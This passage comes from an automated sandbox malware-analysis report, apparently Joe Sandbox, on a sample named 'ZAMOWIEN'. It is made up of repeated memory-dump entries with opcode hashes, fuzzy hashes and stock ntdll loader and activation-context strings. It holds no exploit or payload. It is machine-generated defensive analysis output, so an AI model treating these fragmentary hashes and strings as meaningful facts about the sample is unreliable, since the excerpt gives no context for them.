                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 851bd5a2a013a604e1fe0f80fa2198ac990fb16329dbcfcd7225195a9c34456d
                                                                                  • Instruction ID: 3d555339c7d4252fd8f562d5484c63e5a9984a5ab625b401c4175aa307bf7f88
                                                                                  • Opcode Fuzzy Hash: 851bd5a2a013a604e1fe0f80fa2198ac990fb16329dbcfcd7225195a9c34456d
                                                                                  • Instruction Fuzzy Hash: 84D01736812A10DFDB218B45CA51B5A77B9EF8CB24F911055E411AB655C338EC229694
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                  • Instruction ID: c1b824ae56afb9b9600fdd2f14a17171c0cf75032a457bb9dac4493d61a63623
                                                                                  • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                  • Instruction Fuzzy Hash: 1CC08CBA1422C06AEB1A8B22CA30B283658BB88B55F80119CAA411D8A1C76FE8018209
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                  • Instruction ID: 3508e8683124b71956b119e5d393345537be67b6960636adca4ea7134dbbb872
                                                                                  • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                  • Instruction Fuzzy Hash: DFC08C32080248BBC7129A41DD20F057B2DE790B60F000020B6040A9618576E860D59C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45d6b966c68446d000a8745c3c149cd0bd69e1d0e86db23247acb66d98e6dd13
                                                                                  • Instruction ID: aff0e67000670fec9bb85bb27f0d2a01ee7ce6c9477b931727844b80e102e886
                                                                                  • Opcode Fuzzy Hash: 45d6b966c68446d000a8745c3c149cd0bd69e1d0e86db23247acb66d98e6dd13
                                                                                  • Instruction Fuzzy Hash: 8690027121200156994062595904B4E410547E1302B92D92AE0105954DCD2988657221
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 51c3d041807d281fe8be6807a83b18b0ebee9766e32ebc04f03bac35ad14375e
                                                                                  • Instruction ID: 8bed369c28613e041ee62f9d94f16f6563e25d03e6d39283ccb07271a89057c9
                                                                                  • Opcode Fuzzy Hash: 51c3d041807d281fe8be6807a83b18b0ebee9766e32ebc04f03bac35ad14375e
                                                                                  • Instruction Fuzzy Hash: D590027521100416D9106159590474A004647D0301F52D926E0514958ECA6988A5B121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bea0a2b454c8fbfa59482cd43b220ef4fe423895e9de4d3af1fa76cd36fb7674
                                                                                  • Instruction ID: 462236fdb3c0f0ac57f39b0885ccb4a59ec448e37662a3d534b32dc4c0242603
                                                                                  • Opcode Fuzzy Hash: bea0a2b454c8fbfa59482cd43b220ef4fe423895e9de4d3af1fa76cd36fb7674
                                                                                  • Instruction Fuzzy Hash: BB90026125505116D550715D450471A400567E0201F52C536E0904994EC96A88597221
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b63ec58d45dc5b4040dec31275a005ab192f90aead6b90f19a0b8e7799c34901
                                                                                  • Instruction ID: bd44da880a958efae3183d0f26fd2ecbd7aa5cfe5b7b7d615f37f22060ad0036
                                                                                  • Opcode Fuzzy Hash: b63ec58d45dc5b4040dec31275a005ab192f90aead6b90f19a0b8e7799c34901
                                                                                  • Instruction Fuzzy Hash: D09002A16111005645407159490450A600557E1301392C62AE0644960DCA2D8859B269
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 085a9dabf88b4851e20deef218f8dc9f67bfcb6e6b0f6ed91d69bcd3e45a1c3d
                                                                                  • Instruction ID: 4c0e62dd5e5c0ff92f163155f2e8d3069ba3d5c93e5078fc31dbe6f9eede41e0
                                                                                  • Opcode Fuzzy Hash: 085a9dabf88b4851e20deef218f8dc9f67bfcb6e6b0f6ed91d69bcd3e45a1c3d
                                                                                  • Instruction Fuzzy Hash: D99002716154002695407159498464A400557E0301B52C526E0514954DCE29895A7361
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 772122a696c23e2abafa2ab59610fc3b8b39bd418e0a91425aebf1c9c2f96147
                                                                                  • Instruction ID: deaa24a9d5ec35f957663ca1aff40b24eb8d80d110d9e7ff1d567094d5255b18
                                                                                  • Opcode Fuzzy Hash: 772122a696c23e2abafa2ab59610fc3b8b39bd418e0a91425aebf1c9c2f96147
                                                                                  • Instruction Fuzzy Hash: 7290026121144456D54062594904B0F410547E1202F92C52EE4246954DCD2A88597721
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f2a943d0550645d620e61bfaaa93f789c3b8d912f1307181dbccf503ecad5701
                                                                                  • Instruction ID: ac4bb4da523a41e9b8baf2aa9a32e3138097be32ffe325502d2d8adf6edf67d6
                                                                                  • Opcode Fuzzy Hash: f2a943d0550645d620e61bfaaa93f789c3b8d912f1307181dbccf503ecad5701
                                                                                  • Instruction Fuzzy Hash: DF90026122180056D60065694D14B0B000547D0303F52C62AE0244954DCD2A88657521
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff3d2ec2cdb1b4cead70f9ca68d02f0f255ce6abf8625544b8ed73abc3bda147
                                                                                  • Instruction ID: c9a0a6cad99a333aeff5eee81e0f71f79b4c89bf9f97866755004bfe68c8c763
                                                                                  • Opcode Fuzzy Hash: ff3d2ec2cdb1b4cead70f9ca68d02f0f255ce6abf8625544b8ed73abc3bda147
                                                                                  • Instruction Fuzzy Hash: 9190026125100816D5407159851470B000687D0601F52C526E0114954ECA2B896976B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 883ca6e793e1886691f3dbc000c50b9197b40a31ce0c0551e7d4192c4f88a03e
                                                                                  • Instruction ID: d302529bd733c24029a1a17b34d70fdc6ee2776fd77a579a043b9754069c541d
                                                                                  • Opcode Fuzzy Hash: 883ca6e793e1886691f3dbc000c50b9197b40a31ce0c0551e7d4192c4f88a03e
                                                                                  • Instruction Fuzzy Hash: 9290027121100856D50061594504B4A000547E0301F52C52BE0214A54ECA2AC8557521
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd37ba6b458bb6c609c7eb0dd035cdf1276cf6cb95313cbf0f01c5f19d17b950
                                                                                  • Instruction ID: 184b347666962ddd6665a58d7560cf5f2d335e133828dc94db9da3b2026fbcf4
                                                                                  • Opcode Fuzzy Hash: dd37ba6b458bb6c609c7eb0dd035cdf1276cf6cb95313cbf0f01c5f19d17b950
                                                                                  • Instruction Fuzzy Hash: 35900265231000160545A559070460F044557D6351392C52AF1506990DCA3688697321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df59e6057bad8cb94c81d661c2a732472f3f36930fdae557adf8f39792d1963e
                                                                                  • Instruction ID: f0793300be931a5691c0cefdac28d0ae7f02e191b36fc932e1e8a2fb0a877415
                                                                                  • Opcode Fuzzy Hash: df59e6057bad8cb94c81d661c2a732472f3f36930fdae557adf8f39792d1963e
                                                                                  • Instruction Fuzzy Hash: FF90027161500816D5507159451474A000547D0301F52C526E0114A54ECB6A8A5976A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29311b43fd524ad3a2e9b70b373b075f9ec05939dd3edbf4ed4703af4cc3a409
                                                                                  • Instruction ID: 9e2547f29d203043f1f618a7cd60816edb242899c40ba6af0e38601b77348e14
                                                                                  • Opcode Fuzzy Hash: 29311b43fd524ad3a2e9b70b373b075f9ec05939dd3edbf4ed4703af4cc3a409
                                                                                  • Instruction Fuzzy Hash: BF90027121100816D5046159490478A000547D0301F52C526E6114A55FDA7A88957131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c424c2f7bb3e1f065c6e9abbd22c9204fd2aac98d21e47ec9f7d4fd3e97247f4
                                                                                  • Instruction ID: 167723e55570d880831f7f7e59606c635da1c07f5089fb352edd76ee2976331c
                                                                                  • Opcode Fuzzy Hash: c424c2f7bb3e1f065c6e9abbd22c9204fd2aac98d21e47ec9f7d4fd3e97247f4
                                                                                  • Instruction Fuzzy Hash: 9E900265221000170505A559070460B004647D5351352C536F1105950DDA3688657121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d20d60f3dcf795dd47d967d9e95cece68b4bd5da64bfa2d87c5f33d9d07dc7d9
                                                                                  • Instruction ID: cdb2d9ac3f10d34b8f1bf17a5fa2240e6a836ec9bb03c351c2ee8fee0b76fc04
                                                                                  • Opcode Fuzzy Hash: d20d60f3dcf795dd47d967d9e95cece68b4bd5da64bfa2d87c5f33d9d07dc7d9
                                                                                  • Instruction Fuzzy Hash: 4D9002E1211140A64900A2598504B0E450547E0201B52C52BE1144960DC93A8855B135
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 76dcae8e46affb3a93d508eef37aab3634676c6dd4907d125c3e2282b0bf7e76
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3754132690

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: HEAP:
                                                                                  • API String ID: 3446177414-2466845122
                                                                                  Strings
                                                                                  • ExecuteOptions, xrefs: 377444AB
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37744507
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37744460
                                                                                  • Execute=1, xrefs: 3774451E
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37744530
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 37744592
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3774454D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  Strings
                                                                                  • Actx , xrefs: 37737819, 37737880
                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 377377E2
                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 377377DD, 37737802
                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 377378F3
                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37737807
                                                                                  • SsHd, xrefs: 376EA304
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                  • API String ID: 0-1988757188
                                                                                  APIs
                                                                                  Strings
                                                                                  • Actx , xrefs: 37739315
                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37739153
                                                                                  • GsHd, xrefs: 376ED794
                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37739372
                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3773914E, 37739173
                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37739178
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                  • API String ID: 3446177414-2196497285
                                                                                  • Opcode ID: 87e5acef69ddfce3f8fdab31ac7159284763af43680d5a3ce2504c08bb69d3ee
                                                                                  • Instruction ID: 50e876c213f9315bb2302749bdd860bbff424dd07bb6a4edc31b86f35147881a
                                                                                  • Opcode Fuzzy Hash: 87e5acef69ddfce3f8fdab31ac7159284763af43680d5a3ce2504c08bb69d3ee
                                                                                  • Instruction Fuzzy Hash: DCE1B6746053418FE710CF24C990B5BB7E9BF88368F404A6DE895AB682D771E845CFA2
                                                                                  APIs
                                                                                  • RtlDebugPrintTimes.NTDLL ref: 376C651C
                                                                                    • Part of subcall function 376C6565: RtlDebugPrintTimes.NTDLL ref: 376C6614
                                                                                    • Part of subcall function 376C6565: RtlDebugPrintTimes.NTDLL ref: 376C665F
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377297A0, 377297C9
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 377297B9
                                                                                  • apphelp.dll, xrefs: 376C6446
                                                                                  • LdrpInitShimEngine, xrefs: 37729783, 37729796, 377297BF
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3772977C
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37729790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-204845295
                                                                                  • Opcode ID: 56dea5f1d75c82cbc4d12a64057a37d9a46d0dbd542cbd9da1e6b9283e77af55
                                                                                  • Instruction ID: 45cead949f1eae71ab313e251546e2cff4955dfcbcb15888f27df87e54f96bc9
                                                                                  • Opcode Fuzzy Hash: 56dea5f1d75c82cbc4d12a64057a37d9a46d0dbd542cbd9da1e6b9283e77af55
                                                                                  • Instruction Fuzzy Hash: 8E51DF712483019FE720DF20C8A1BAB77E8EF89764F440919F595AB260DB34E904DF97
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                  • API String ID: 3446177414-4227709934
                                                                                  • Opcode ID: 68bbd26d0f4e72a5d79a3287e535a88f9c95f318c0d5b06c20a2a5e01d9ed802
                                                                                  • Instruction ID: 004caec817a1be665784e37e13a784b815e3422db14f153a6ac672c1faa1cd41
